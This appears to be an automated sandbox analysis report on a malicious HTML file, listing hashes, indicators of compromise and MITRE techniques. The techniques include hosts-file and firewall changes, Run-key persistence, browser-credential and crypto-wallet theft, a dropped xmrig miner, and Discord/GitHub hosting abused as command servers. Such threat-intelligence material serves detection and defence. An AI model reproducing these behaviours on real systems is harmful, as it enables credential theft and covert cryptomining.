93a57aba9610c7dbf929c7978f9529890c32c01982d90ae75c6445c9a3e0fa58

Analysis

max time kernel
630s
max time network
639s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
09-03-2024 01:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

23aQJ84zcVNf.html
Size

373KB
MD5

b14b83ba0436ba886b73df37bb6eab3e
SHA1

83b2c61d430393fdd359622c5450b41c2ee4f86d
SHA256

93a57aba9610c7dbf929c7978f9529890c32c01982d90ae75c6445c9a3e0fa58
SHA512

93063c0968fee846fd46b1100660c192b49f76a65b2f4229ce01661c5797687fa931591d773a15798fb68ad2442ae1b492480c710adf8b0c3f6efcb908bed17c
SSDEEP

3072:cC6+rSRprV2aDhaBKEr4TVEK1MAxAQceDex8PS9:J6+rQaBKEr4TVEK1WGPS9

Score

8^/10

evasion persistence spyware stealer upx

Malware Config

Signatures

Drops file in Drivers directory 9 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	client-built.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	bound.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	rose.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4536	netsh.exe
5784	netsh.exe

Executes dropped EXE 7 IoCs

pid	Process
4444	bound.exe
1328	bound.exe
1400	rar.exe
7664	xmrig.exe
3964	rose.exe
4372	rose.exe
8260	xmrig.exe

Loads dropped DLL 64 IoCs

pid	Process
5792	client-built.exe
5792	client-built.exe
5792	client-built.exe
5792	client-built.exe
5792	client-built.exe
5792	client-built.exe
5792	client-built.exe
5792	client-built.exe
5792	client-built.exe
5792	client-built.exe
5792	client-built.exe
5792	client-built.exe
5792	client-built.exe
5792	client-built.exe
5792	client-built.exe
5792	client-built.exe
5564	client-built.exe
5564	client-built.exe
5564	client-built.exe
5564	client-built.exe
6640	client-built.exe
6640	client-built.exe
6640	client-built.exe
6640	client-built.exe
5564	client-built.exe
5564	client-built.exe
5564	client-built.exe
5564	client-built.exe
5564	client-built.exe
5564	client-built.exe
5564	client-built.exe
5564	client-built.exe
5564	client-built.exe
5564	client-built.exe
5564	client-built.exe
5792	client-built.exe
6640	client-built.exe
6640	client-built.exe
6640	client-built.exe
6640	client-built.exe
6640	client-built.exe
6640	client-built.exe
6640	client-built.exe
6640	client-built.exe
6640	client-built.exe
6640	client-built.exe
6640	client-built.exe
1328	bound.exe
1328	bound.exe
1328	bound.exe
1328	bound.exe
1328	bound.exe
1328	bound.exe
1328	bound.exe
1328	bound.exe
1328	bound.exe
1328	bound.exe
1328	bound.exe
1328	bound.exe
1328	bound.exe
1328	bound.exe
1328	bound.exe
1328	bound.exe
1328	bound.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000700000002345b-22.dat	upx
behavioral2/files/0x000700000002345b-23.dat	upx
behavioral2/memory/5792-26-0x00007FFB2F440000-0x00007FFB2FA29000-memory.dmp	upx
behavioral2/files/0x000700000002344b-28.dat	upx
behavioral2/memory/5792-32-0x00007FFB41240000-0x00007FFB41263000-memory.dmp	upx
behavioral2/memory/5792-50-0x00007FFB41CD0000-0x00007FFB41CDF000-memory.dmp	upx
behavioral2/files/0x0007000000023452-49.dat	upx
behavioral2/files/0x0007000000023451-48.dat	upx
behavioral2/files/0x0007000000023450-47.dat	upx
behavioral2/files/0x000700000002344f-46.dat	upx
behavioral2/files/0x000700000002344e-45.dat	upx
behavioral2/files/0x000700000002344d-44.dat	upx
behavioral2/files/0x000700000002344c-43.dat	upx
behavioral2/files/0x000700000002344a-42.dat	upx
behavioral2/files/0x0007000000023460-41.dat	upx
behavioral2/files/0x000700000002345f-40.dat	upx
behavioral2/files/0x000700000002345e-39.dat	upx
behavioral2/files/0x000700000002345a-36.dat	upx
behavioral2/files/0x0007000000023458-35.dat	upx
behavioral2/files/0x0007000000023459-31.dat	upx
behavioral2/memory/5792-68-0x00007FFB3AB20000-0x00007FFB3AB4D000-memory.dmp	upx
behavioral2/memory/5792-76-0x00007FFB3AA00000-0x00007FFB3AA23000-memory.dmp	upx
behavioral2/memory/5792-85-0x00007FFB2F2C0000-0x00007FFB2F437000-memory.dmp	upx
behavioral2/files/0x0007000000023458-92.dat	upx
behavioral2/memory/5792-94-0x00007FFB30E20000-0x00007FFB30EED000-memory.dmp	upx
behavioral2/memory/5792-93-0x00007FFB31820000-0x00007FFB31853000-memory.dmp	upx
behavioral2/files/0x0007000000023458-91.dat	upx
behavioral2/memory/5792-95-0x00007FFB2EDA0000-0x00007FFB2F2C0000-memory.dmp	upx
behavioral2/memory/5792-99-0x00007FFB41110000-0x00007FFB4111D000-memory.dmp	upx
behavioral2/memory/5792-101-0x00007FFB41200000-0x00007FFB4120D000-memory.dmp	upx
behavioral2/memory/5792-107-0x00007FFB32C70000-0x00007FFB32C84000-memory.dmp	upx
behavioral2/files/0x0007000000023481-113.dat	upx
behavioral2/memory/5564-117-0x00007FFB2E7B0000-0x00007FFB2ED99000-memory.dmp	upx
behavioral2/memory/5564-122-0x00007FFB317F0000-0x00007FFB31813000-memory.dmp	upx
behavioral2/memory/5564-138-0x00007FFB3AC60000-0x00007FFB3AC6F000-memory.dmp	upx
behavioral2/memory/6640-152-0x00007FFB2E1C0000-0x00007FFB2E7A9000-memory.dmp	upx
behavioral2/memory/6640-153-0x00007FFB38220000-0x00007FFB3822F000-memory.dmp	upx
behavioral2/memory/5792-158-0x00007FFB2F440000-0x00007FFB2FA29000-memory.dmp	upx
behavioral2/memory/6640-159-0x00007FFB30D90000-0x00007FFB30DB3000-memory.dmp	upx
behavioral2/memory/5564-160-0x00007FFB30B40000-0x00007FFB30B6D000-memory.dmp	upx
behavioral2/memory/5564-161-0x00007FFB30430000-0x00007FFB30453000-memory.dmp	upx
behavioral2/memory/5564-163-0x00007FFB30D70000-0x00007FFB30D89000-memory.dmp	upx
behavioral2/memory/5564-164-0x00007FFB30B20000-0x00007FFB30B39000-memory.dmp	upx
behavioral2/memory/5564-167-0x00007FFB317F0000-0x00007FFB31813000-memory.dmp	upx
behavioral2/memory/5564-166-0x00007FFB2E7B0000-0x00007FFB2ED99000-memory.dmp	upx
behavioral2/memory/5564-171-0x00007FFB30B40000-0x00007FFB30B6D000-memory.dmp	upx
behavioral2/memory/5564-174-0x00007FFB30D70000-0x00007FFB30D89000-memory.dmp	upx
behavioral2/memory/5564-173-0x00007FFB303F0000-0x00007FFB30423000-memory.dmp	upx
behavioral2/memory/5564-176-0x00007FFB2DB20000-0x00007FFB2E040000-memory.dmp	upx
behavioral2/memory/5564-178-0x00007FFB2DA50000-0x00007FFB2DB1D000-memory.dmp	upx
behavioral2/memory/5564-180-0x00007FFB303D0000-0x00007FFB303E4000-memory.dmp	upx
behavioral2/memory/5564-182-0x00007FFB30B20000-0x00007FFB30B39000-memory.dmp	upx
behavioral2/memory/5792-183-0x00007FFB3AA00000-0x00007FFB3AA23000-memory.dmp	upx
behavioral2/memory/5792-194-0x00007FFB2D930000-0x00007FFB2DA4C000-memory.dmp	upx
behavioral2/memory/5792-190-0x00007FFB2EDA0000-0x00007FFB2F2C0000-memory.dmp	upx
behavioral2/memory/5792-185-0x00007FFB2F2C0000-0x00007FFB2F437000-memory.dmp	upx
behavioral2/memory/5564-181-0x00007FFB30360000-0x00007FFB3036D000-memory.dmp	upx
behavioral2/memory/6640-199-0x00007FFB2CC80000-0x00007FFB2CC99000-memory.dmp	upx
behavioral2/memory/5792-201-0x00007FFB2F440000-0x00007FFB2FA29000-memory.dmp	upx
behavioral2/memory/6640-202-0x00007FFB2E1C0000-0x00007FFB2E7A9000-memory.dmp	upx
behavioral2/memory/6640-205-0x00007FFB30D90000-0x00007FFB30DB3000-memory.dmp	upx
behavioral2/memory/6640-207-0x00007FFB38220000-0x00007FFB3822F000-memory.dmp	upx
behavioral2/memory/6640-210-0x00007FFB2CC80000-0x00007FFB2CC99000-memory.dmp	upx
behavioral2/memory/6640-237-0x00007FFB2BD40000-0x00007FFB2BD73000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rose = "C:\\Users\\Admin\\AppData\\Roaming\\rose\\rose.exe"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 57 IoCs

Web Service

T1102

flow	ioc
1236	discord.com
1246	raw.githubusercontent.com
1252	raw.githubusercontent.com
1265	raw.githubusercontent.com
1280	discord.com
1281	discord.com
1203	discord.com
1229	discord.com
1234	raw.githubusercontent.com
1279	discord.com
1216	raw.githubusercontent.com
1206	discord.com
1235	discord.com
1247	discord.com
1251	discord.com
1182	raw.githubusercontent.com
1194	discord.com
1197	discord.com
1282	raw.githubusercontent.com
1193	discord.com
1257	raw.githubusercontent.com
1190	raw.githubusercontent.com
1184	discord.com
1192	discord.com
1196	raw.githubusercontent.com
1223	discord.com
1243	discord.com
1275	discord.com
1183	raw.githubusercontent.com
1214	raw.githubusercontent.com
1224	discord.com
1242	raw.githubusercontent.com
1268	discord.com
1202	discord.com
1253	discord.com
1258	discord.com
1267	raw.githubusercontent.com
1185	discord.com
1245	raw.githubusercontent.com
1191	raw.githubusercontent.com
1248	discord.com
1254	raw.githubusercontent.com
1256	discord.com
1198	raw.githubusercontent.com
1205	raw.githubusercontent.com
1237	discord.com
1250	discord.com
1255	discord.com
1274	discord.com
1283	discord.com
435	discord.com
1277	discord.com
1204	discord.com
1225	discord.com
1226	discord.com
1249	raw.githubusercontent.com
1217	discord.com

Looks up external IP address via web service 14 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1180	api.ipify.org
1189	api.ipify.org
1209	ipinfo.io
1212	api.ipify.org
1241	api.ipify.org
1262	ipinfo.io
1264	api.ipify.org
1181	api.ipify.org
1213	api.ipify.org
1244	api.ipify.org
1261	ipinfo.io
1199	ip-api.com
1210	ipinfo.io
1263	api.ipify.org

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5760	WMIC.exe

Enumerates processes with tasklist 1 TTPs 4 IoCs

Process Discovery

T1057

pid	Process
7216	tasklist.exe
7208	tasklist.exe
7840	tasklist.exe
7692	tasklist.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
7848	systeminfo.exe

Kills process with taskkill 56 IoCs

evasion

pid	Process
7988	taskkill.exe
7188	taskkill.exe
7024	taskkill.exe
6348	taskkill.exe
7060	taskkill.exe
6384	taskkill.exe
6644	taskkill.exe
5876	taskkill.exe
4472	taskkill.exe
5096	taskkill.exe
7880	taskkill.exe
2148	taskkill.exe
5828	taskkill.exe
3356	taskkill.exe
8064	taskkill.exe
5572	taskkill.exe
7964	taskkill.exe
6632	taskkill.exe
5100	taskkill.exe
4504	taskkill.exe
2968	taskkill.exe
7188	taskkill.exe
7608	taskkill.exe
7604	taskkill.exe
7624	taskkill.exe
2744	taskkill.exe
7804	taskkill.exe
8172	taskkill.exe
7292	taskkill.exe
8096	taskkill.exe
7212	taskkill.exe
3048	taskkill.exe
1368	taskkill.exe
6620	taskkill.exe
468	taskkill.exe
496	taskkill.exe
7144	taskkill.exe
1672	taskkill.exe
6088	taskkill.exe
7572	taskkill.exe
7556	taskkill.exe
8004	taskkill.exe
7456	taskkill.exe
8048	taskkill.exe
712	taskkill.exe
1648	taskkill.exe
2172	taskkill.exe
4756	taskkill.exe
3308	taskkill.exe
7436	taskkill.exe
4276	taskkill.exe
8084	taskkill.exe
5368	taskkill.exe
7304	taskkill.exe
7928	taskkill.exe
7236	taskkill.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1904519900-954640453-4250331663-1000\{BC53A062-52FC-4FDD-88F3-BF8586F5D49C}	bound.exe
Key created	\REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000_Classes\Local Settings	taskmgr.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1904519900-954640453-4250331663-1000\{46B7E225-2FFE-4134-8366-D294F230E3FF}	rose.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
6164	powershell.exe
6164	powershell.exe
6080	powershell.exe
6080	powershell.exe
7344	powershell.exe
7344	powershell.exe
6164	powershell.exe
6164	powershell.exe
6080	powershell.exe
6080	powershell.exe
7512	powershell.exe
7512	powershell.exe
7608	powershell.exe
7608	powershell.exe
7872	powershell.exe
7872	powershell.exe
7608	powershell.exe
7344	powershell.exe
7512	powershell.exe
7872	powershell.exe
1328	bound.exe
1328	bound.exe
6764	powershell.exe
6764	powershell.exe
6764	powershell.exe
3364	powershell.exe
3364	powershell.exe
3364	powershell.exe
6960	powershell.exe
6960	powershell.exe
6960	powershell.exe
6624	powershell.exe
6624	powershell.exe
6624	powershell.exe
1964	powershell.exe
1964	powershell.exe
1964	powershell.exe
6080	powershell.exe
6080	powershell.exe
6080	powershell.exe
1328	bound.exe
1328	bound.exe
1328	bound.exe
1328	bound.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3308	taskmgr.exe

Suspicious behavior: LoadsDriver 8 IoCs

pid	Process
4	Process not Found
4	Process not Found
4	Process not Found
4	Process not Found
4	Process not Found
672	Process not Found
672	Process not Found
672	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	6164	powershell.exe
Token: SeDebugPrivilege	6080	powershell.exe
Token: SeDebugPrivilege	7208	tasklist.exe
Token: SeDebugPrivilege	7216	tasklist.exe
Token: SeDebugPrivilege	7344	powershell.exe
Token: SeDebugPrivilege	7512	powershell.exe
Token: SeDebugPrivilege	7608	powershell.exe
Token: SeDebugPrivilege	7840	tasklist.exe
Token: SeIncreaseQuotaPrivilege	7824	WMIC.exe
Token: SeSecurityPrivilege	7824	WMIC.exe
Token: SeTakeOwnershipPrivilege	7824	WMIC.exe
Token: SeLoadDriverPrivilege	7824	WMIC.exe
Token: SeSystemProfilePrivilege	7824	WMIC.exe
Token: SeSystemtimePrivilege	7824	WMIC.exe
Token: SeProfSingleProcessPrivilege	7824	WMIC.exe
Token: SeIncBasePriorityPrivilege	7824	WMIC.exe
Token: SeCreatePagefilePrivilege	7824	WMIC.exe
Token: SeBackupPrivilege	7824	WMIC.exe
Token: SeRestorePrivilege	7824	WMIC.exe
Token: SeShutdownPrivilege	7824	WMIC.exe
Token: SeDebugPrivilege	7824	WMIC.exe
Token: SeSystemEnvironmentPrivilege	7824	WMIC.exe
Token: SeRemoteShutdownPrivilege	7824	WMIC.exe
Token: SeUndockPrivilege	7824	WMIC.exe
Token: SeManageVolumePrivilege	7824	WMIC.exe
Token: 33	7824	WMIC.exe
Token: 34	7824	WMIC.exe
Token: 35	7824	WMIC.exe
Token: 36	7824	WMIC.exe
Token: SeDebugPrivilege	7872	powershell.exe
Token: SeIncreaseQuotaPrivilege	7824	WMIC.exe
Token: SeSecurityPrivilege	7824	WMIC.exe
Token: SeTakeOwnershipPrivilege	7824	WMIC.exe
Token: SeLoadDriverPrivilege	7824	WMIC.exe
Token: SeSystemProfilePrivilege	7824	WMIC.exe
Token: SeSystemtimePrivilege	7824	WMIC.exe
Token: SeProfSingleProcessPrivilege	7824	WMIC.exe
Token: SeIncBasePriorityPrivilege	7824	WMIC.exe
Token: SeCreatePagefilePrivilege	7824	WMIC.exe
Token: SeBackupPrivilege	7824	WMIC.exe
Token: SeRestorePrivilege	7824	WMIC.exe
Token: SeShutdownPrivilege	7824	WMIC.exe
Token: SeDebugPrivilege	7824	WMIC.exe
Token: SeSystemEnvironmentPrivilege	7824	WMIC.exe
Token: SeRemoteShutdownPrivilege	7824	WMIC.exe
Token: SeUndockPrivilege	7824	WMIC.exe
Token: SeManageVolumePrivilege	7824	WMIC.exe
Token: 33	7824	WMIC.exe
Token: 34	7824	WMIC.exe
Token: 35	7824	WMIC.exe
Token: 36	7824	WMIC.exe
Token: SeDebugPrivilege	8096	taskkill.exe
Token: SeDebugPrivilege	7692	tasklist.exe
Token: SeDebugPrivilege	7572	taskkill.exe
Token: SeDebugPrivilege	7456	taskkill.exe
Token: SeDebugPrivilege	1328	bound.exe
Token: SeDebugPrivilege	5368	taskkill.exe
Token: SeDebugPrivilege	7804	taskkill.exe
Token: SeDebugPrivilege	8048	taskkill.exe
Token: SeDebugPrivilege	7304	taskkill.exe
Token: SeDebugPrivilege	7988	taskkill.exe
Token: SeDebugPrivilege	6384	taskkill.exe
Token: SeDebugPrivilege	468	taskkill.exe
Token: SeDebugPrivilege	5572	taskkill.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
7664	xmrig.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe
3308	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 6192 wrote to memory of 5792	6192	client-built.exe	169
PID 6192 wrote to memory of 5792	6192	client-built.exe	169
PID 5792 wrote to memory of 7072	5792	client-built.exe	172
PID 5792 wrote to memory of 7072	5792	client-built.exe	172
PID 5792 wrote to memory of 6972	5792	client-built.exe	173
PID 5792 wrote to memory of 6972	5792	client-built.exe	173
PID 6340 wrote to memory of 5564	6340	client-built.exe	176
PID 6340 wrote to memory of 5564	6340	client-built.exe	176
PID 4080 wrote to memory of 6640	4080	client-built.exe	177
PID 4080 wrote to memory of 6640	4080	client-built.exe	177
PID 5792 wrote to memory of 5420	5792	client-built.exe	178
PID 5792 wrote to memory of 5420	5792	client-built.exe	178
PID 5792 wrote to memory of 6076	5792	client-built.exe	181
PID 5792 wrote to memory of 6076	5792	client-built.exe	181
PID 7072 wrote to memory of 6164	7072	cmd.exe	180
PID 7072 wrote to memory of 6164	7072	cmd.exe	180
PID 6972 wrote to memory of 6080	6972	cmd.exe	179
PID 6972 wrote to memory of 6080	6972	cmd.exe	179
PID 5792 wrote to memory of 2568	5792	client-built.exe	183
PID 5792 wrote to memory of 2568	5792	client-built.exe	183
PID 5792 wrote to memory of 6348	5792	client-built.exe	186
PID 5792 wrote to memory of 6348	5792	client-built.exe	186
PID 5792 wrote to memory of 1424	5792	client-built.exe	189
PID 5792 wrote to memory of 1424	5792	client-built.exe	189
PID 5792 wrote to memory of 5920	5792	client-built.exe	188
PID 5792 wrote to memory of 5920	5792	client-built.exe	188
PID 5792 wrote to memory of 5668	5792	client-built.exe	194
PID 5792 wrote to memory of 5668	5792	client-built.exe	194
PID 5792 wrote to memory of 6628	5792	client-built.exe	193
PID 5792 wrote to memory of 6628	5792	client-built.exe	193
PID 5792 wrote to memory of 6700	5792	client-built.exe	196
PID 5792 wrote to memory of 6700	5792	client-built.exe	196
PID 5792 wrote to memory of 4944	5792	client-built.exe	195
PID 5792 wrote to memory of 4944	5792	client-built.exe	195
PID 5792 wrote to memory of 5052	5792	client-built.exe	330
PID 5792 wrote to memory of 5052	5792	client-built.exe	330
PID 5792 wrote to memory of 6196	5792	client-built.exe	203
PID 5792 wrote to memory of 6196	5792	client-built.exe	203
PID 5792 wrote to memory of 2888	5792	client-built.exe	204
PID 5792 wrote to memory of 2888	5792	client-built.exe	204
PID 5792 wrote to memory of 6740	5792	client-built.exe	205
PID 5792 wrote to memory of 6740	5792	client-built.exe	205
PID 5920 wrote to memory of 7208	5920	cmd.exe	209
PID 5920 wrote to memory of 7208	5920	cmd.exe	209
PID 1424 wrote to memory of 7216	1424	cmd.exe	210
PID 1424 wrote to memory of 7216	1424	cmd.exe	210
PID 5420 wrote to memory of 7344	5420	cmd.exe	412
PID 5420 wrote to memory of 7344	5420	cmd.exe	412
PID 2568 wrote to memory of 7356	2568	cmd.exe	213
PID 2568 wrote to memory of 7356	2568	cmd.exe	213
PID 6348 wrote to memory of 7512	6348	cmd.exe	214
PID 6348 wrote to memory of 7512	6348	cmd.exe	214
PID 5668 wrote to memory of 7608	5668	cmd.exe	308
PID 5668 wrote to memory of 7608	5668	cmd.exe	308
PID 6076 wrote to memory of 4444	6076	cmd.exe	202
PID 6076 wrote to memory of 4444	6076	cmd.exe	202
PID 6628 wrote to memory of 7824	6628	cmd.exe	216
PID 6628 wrote to memory of 7824	6628	cmd.exe	216
PID 6700 wrote to memory of 7832	6700	cmd.exe	217
PID 6700 wrote to memory of 7832	6700	cmd.exe	217
PID 4944 wrote to memory of 7840	4944	cmd.exe	218
PID 4944 wrote to memory of 7840	4944	cmd.exe	218
PID 6196 wrote to memory of 7848	6196	cmd.exe	219
PID 6196 wrote to memory of 7848	6196	cmd.exe	219

Views/modifies file attributes 1 TTPs 6 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2116	attrib.exe
2776	attrib.exe
6512	attrib.exe
7992	attrib.exe
6728	attrib.exe
3428	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\23aQJ84zcVNf.html
1⤵
PID:1832

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --mojo-platform-channel-handle=4816 --field-trial-handle=2264,i,13734085038406049477,12426093271221802693,262144 --variations-seed-version /prefetch:1
1⤵
PID:2980

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --mojo-platform-channel-handle=5208 --field-trial-handle=2264,i,13734085038406049477,12426093271221802693,262144 --variations-seed-version /prefetch:1
1⤵
PID:4932

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4556 --field-trial-handle=2264,i,13734085038406049477,12426093271221802693,262144 --variations-seed-version /prefetch:8
1⤵
PID:4712

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --mojo-platform-channel-handle=5716 --field-trial-handle=2264,i,13734085038406049477,12426093271221802693,262144 --variations-seed-version /prefetch:1
1⤵
PID:1600

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=5124 --field-trial-handle=2264,i,13734085038406049477,12426093271221802693,262144 --variations-seed-version /prefetch:8
1⤵
PID:3256

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=3428 --field-trial-handle=2264,i,13734085038406049477,12426093271221802693,262144 --variations-seed-version /prefetch:8
1⤵
PID:1144

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --mojo-platform-channel-handle=5044 --field-trial-handle=2264,i,13734085038406049477,12426093271221802693,262144 --variations-seed-version /prefetch:8
1⤵
PID:2328

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
